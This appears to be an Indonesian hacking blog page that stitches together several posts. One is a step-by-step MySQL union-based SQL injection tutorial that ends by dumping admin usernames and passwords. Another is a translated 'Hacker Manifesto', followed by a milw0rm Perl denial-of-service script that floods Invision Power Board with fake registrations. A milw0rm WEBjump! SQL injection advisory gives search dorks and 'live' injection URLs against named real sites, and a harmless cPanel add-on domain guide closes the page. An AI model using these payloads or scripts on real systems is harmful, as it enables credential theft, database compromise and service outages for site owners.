My SQL Injection Step by Step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda...



Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection

DOWNLOAD

anda langsung jalankan file " SQL Injection.html "


(Nb. mohon maaf apabila ada salah kata atau kekurangan dalam tutorial + video ini)


Salam

Gonzhack

HIDUPLAH INDONESIA RAYA...

WWW.INDONESIANCODER.COM

Manifesto Hacker

Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
Kami menjelajah, dan kalian sebut kami kriminal.
Kami mengejar pengetahuan, dan kalian sebut kami kriminal. Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
Kalian membuat bom atom, kalian mengejar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba menyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
Ya, aku memang kriminal.
Kejahatanku adalah rasa keingintahuanku.
Kejahatanku adalah menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kalian maafkan.
Aku memang seorang hacker, dan inilah manifesto saya.
Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
Bagaimanapun juga, kami semua senasib seperjuangan.

Manifesto Hacker





HIDUPLAH INDONESIA RAYA...

WWW.INDONESIANCODER.COM

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = ;
chop ($serv);
print "Forum Path: ";
$path = ;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]



HIDUPLAH INDONESIA RAYA...

WWW.INDONESIANCODER.COM

MS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]

Add-On Domain di cpanel

Model Marketing mutakhir dan paling umum beberapa situs hosting adalah dengan menawarkan pilihan “Add-On Dmmain”. Istilah ini merujuk pada domain tambahan yang dikelola di bawah akun hosting utama. Biasanya, domain-domain tambahan ini secara fisik akan ditempatkan di dalam sub-direktori root dokumen hosting. Selanjutnya Add-On Domain akan berbagi resource dengan pembatasan yang sama dengan akun hosting utama termasuk bandwith, space harddisk, akun email, database dan fasilitas lainnya. Uniknya Add-on domain dapat diakses langsung dari nama domain dedicated-nya sendiridan mempunyai akun FTP serta statistik situs sendiri. Misalnya: indonesiancoder.com, saya tambahkan Addon Domain indonesiancoder.co.cc, saya bisa langsung akses addon domain dengan mengetikkan indonesiancoder.co.cc di browser yang saya pakai.

Anda dapat membuat Add-on domain ini melalui Cpanel dengan cara:

1. Temukan grup “Addon Domains” pada menu utama.
2. Masukkan nama domain, nama direktori tempat penyimpanan data add-on domain berikut passwordnya.
3. Ingat, jangan buat direktori dulu, CPanel otomatis akan membuatkan direktori saat proses pembuatan Addon Domain buat Anda sekaligus menambahkannya ke dalam entri data konfigurasi server hosting, mengarahkan domain ke direktori tersebut serta membuatkan akun ftp untuk domain tersebut.

Login FTP yang dipakai menggunakan format “namadirektori@namawebsiteutama.com”. Jika Anda memiliki hosting di namawebsiteutama.com dan Anda membuat addon domain bernama namadomainaddonnya.com, dengan nama direktori namadomainaddonnya dan password ‘terserahanda’ maka Anda akan login ke ftp.contoh.com dengan username namadomainaddonnya@namawebsiteutama.com dan password ‘terserahanda’.

Tapi ingat, Anda tetap harus mendaftarkan nama add-on domain yang Anda pilih persis seperti Anda mendaftarkan nama domain pada umumnya. Anda juga harus mengarahkan Nameserver Domain ke Nameserver domain utama Anda.

Beberapa hal yang perlu diperhatikan tentang Search Engine dan Add-On Domain


Website biasanya akan lebih mudah dikenali Google dan mesin pencari lain jika menggunakan satu URL statis saja. Ketika Anda membuat Add-on Domain lewat CPanel dengan cara di atas, Add-on domain Anda dapat diakses melakui tiga alamat sebagai berikut:


http://www.contoh2.com
http://contoh2.contoh.com (sebagai subdomain akun hosting utama)
http://www.contoh.com/contoh2/ (sebagai subdirektori akun hosting utama)
Hal di atas bisa mengakibatkan kacaunya pencatatan statistik website oleh search engine. Oleh karena itu pastikan Anda menggunakan fitur Redirects dalam CPanel untuk mengarahkan permintaan contoh.com/contoh ke addon domain yang tepat yakni contoh2.com. Anda juga harus menambahkan entri dalam file .htacces domain And auntuk me-redirect contoh2.contoh.com ke contoh2.com.
File .htaccess Anda seharusnya kurang lebih akan berisi kode seperti di bawah ini:

Options +FollowSymLinks
RewriteEngine on
#
# Redirect if “contoh” subdomain requested
RewriteCond %{HTTP_HOST} ^contoh2\.contoh.com
RewriteRule ^(.*)$ http://www.contoh2.com/$1 [R=301,L]



sekian dan terimakasih

wassalam

dengan hormat

Don Tukulesto


HIDUPLAH INDONESIA RAYA...

WWW.INDONESIANCODER.COM

Labels